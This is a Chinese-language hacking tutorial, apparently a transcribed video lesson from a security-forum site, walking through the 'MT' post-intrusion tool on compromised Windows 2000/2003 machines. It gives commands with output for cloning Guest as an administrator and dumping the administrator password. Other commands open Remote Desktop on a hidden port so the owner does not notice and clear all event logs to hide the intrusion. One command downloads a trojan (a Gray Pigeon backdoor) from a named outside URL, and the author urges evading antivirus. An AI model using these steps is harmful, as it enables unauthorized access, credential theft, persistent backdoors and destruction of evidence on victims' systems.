今天来讲一下MT的详细用法,MT只有40几K,担功能却是非常强大的.很多时候在入

侵时用款小工具能帮忙我们解决很多问题...现在就来详细的讲解一下mt具体应

用..

1.mt -sysinfo 查看机器配置

先来看一下..看到没??这里就会列举出来本机的各种配置信息....看下面.这里面列举了现在系统打过的补丁,这里显示了本机硬件的配置..CPU等..这里显示了本机IP地址,子网,和网关...

2.type c:oot.in 查看启动文件
这主要是调 用了c:oot.i 这个文件,就是开机的双启动菜单,通过它来查看本机用的是什么系统.这里多说一个.. VER功能和它也是一样的.它是系统命令..

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)WINNT="Microsoft Windows 2000 Server" /fastd
etect

C:>ver

Microsoft Windows 2000 [Version 5.00.2195]

看到了吧?2000的系统..

3.mt -clone Administrator guest 意思是把guest克隆为管理员（必需是系统权

限才能运行）

4.mt -chkuser 查看自己机器里是否有克隆的帐户
用它也可以来查看自己的机器是否被人克隆了帐户..
看到了吧..

5.mt -findpass 查看管理员密码（仅2000/2003）
这个功能和一个findpass的功能是一样的.

C:>mt -findpass

The logon information :
Domain : 77AFCF2E775047B
Username : Administrator
Password : 123

看到了吧?我系统的密码就是123

6.mt -pslist 查看进程
此功能是在DOS下显示主机现在正在运行的程序.如果是在XP下
我们就可以直接用tasklist 就可以了...担在2000下不技术
就这样子..看到了吧?
再试个..
关它..

7.mt -pskill 杀除进程

些功能就是杀掉某个进程,这里我们可以试一下.
现在我们来关掉932这个进程..
C:>mt -pskill 772

Kill process sccuessful!

已经关掉了..

8.mt -setupts 安装终端服务（仅2000/2003好用）
这里说明下,我们平时我们在入侵2000的机器时有时开不了3389,那是因为只有2000服务器版的系统才能开3389,如果不是服务器版的,是开不了3389的,这也是有很多人不问为什么就一直开3389而打不开的原因..
我虚拟机不是服务器的,所以打不开..就是这意思..

9.mt -chgtsp 1030 改终端端口
当我们开了对方机子3389后,主人很容易会发现开放,那我们可以把3389的端口给改这样只有我们自己去用它...
1030 这个改成你想要的端口..

10.mt -reboot 重启
不带有任何提示,直接重启....一会我试下..

11.mt -netget http://或者ftp://www/.你木马的地址 c:
.exe 下载木马

功能和vget是一样的,我们来试下..

Fail to open registy key...
C:>mt -netget http://user.free2.77169.net/didiaoyin/mm.exe c:mm.exe

Download File from http://user.free2.77169.net/didiaoyin/mm.exe to c:
Download completed 290817 bytes ......
Downloaded 284.0KB @94.7KB/S in 2sec.

File <c:mm.exe> TotalByte : 284 KB.
看到了吧?现在来看一下..我的鸽子...

12.mt -clog all 删除所有应用程序，系统，日志等

这个都明白吧...
C:>mt -clog all
Clean EventLog : Application successful!
Clean EventLog : Security successful!
Clean EventLog : System successful!

这样就把日志都删除了...

13.mt -dlllist 列出进程DLL

格式是mt -dlllist 进程号

这样就可以把对应进程号的进程显示出所有的DLL文件

这个在我们查马时很有用..

此功能目的是列出进程的DLL文件,我们来看下..

14.mt -poweroff 关掉电源。
没什么好说的,直接关机..

15.mt -logoff 注销
直接注销.

16.mt -shutdown 关机(都不会有任何提示)

关机..

17.mt -chkts 检查终端信息

没有.
18.mt -remts 卸载终端服务

这个就和刚才的那个8.mt -setupts 是对应的,卸载终端...

http://user.free2.77169.net/didiaoyin/mm.exe

好了,MT的基本用法就这么多,功能还是很多的...担是现在杀软都杀它..我们要自己做免杀...
现在来试下mt -logoff 这个吧,注销,看下效果..关机也是一样的..

看到了吧?不会有任何提示,直接关...

好了,今天教程就到这里了..

再见...

• [VIP专用软件 - 电信高速下载][非高级会员不可下载]
• [VIP专用软件 - 双线高速下载][非高级会员不可下载]

• ☉ Delphi编程教学系列（新世纪网安基地VIP教程）
• ☉ virtualpc中的linux如何连上Internet
• ☉ ProE 2.0安装视频
• ☉ 学会利用系统自身资源
• ☉ JSP开发之一Servlet基础
• ☉ 内网架设DNS服务器详解
• ☉ 心动吧桌面图之serv-U反弹
• ☉ 小解TTL的妙用
• ☉ 免费的网络电脑
• ☉ 略施小计吓跑不怀好意的菜鸟

• ☉ 由于私服程序的特殊性，它非常容易被杀毒误报，所以自2011年1月起本站所有软件都不在做杀毒查杀，请下载后自行检测查杀！
• ☉ 为了达到最快的下载速度，推荐使用 迅雷5 下载本站软件。
• ☉ 本站软件均为WinRAR3.7版本压缩，所以请一定升级到WinRAR3.7或最新版才能正常解压本站提供的软件!
• ☉ 如果您发现下载链接错误，或内容与分类不匹配，请点击报告错误。正确报错10个我们将送您VIP会员！
• ☉ 如发现本站软件需要解压密码，均为：www.9876543210sf.com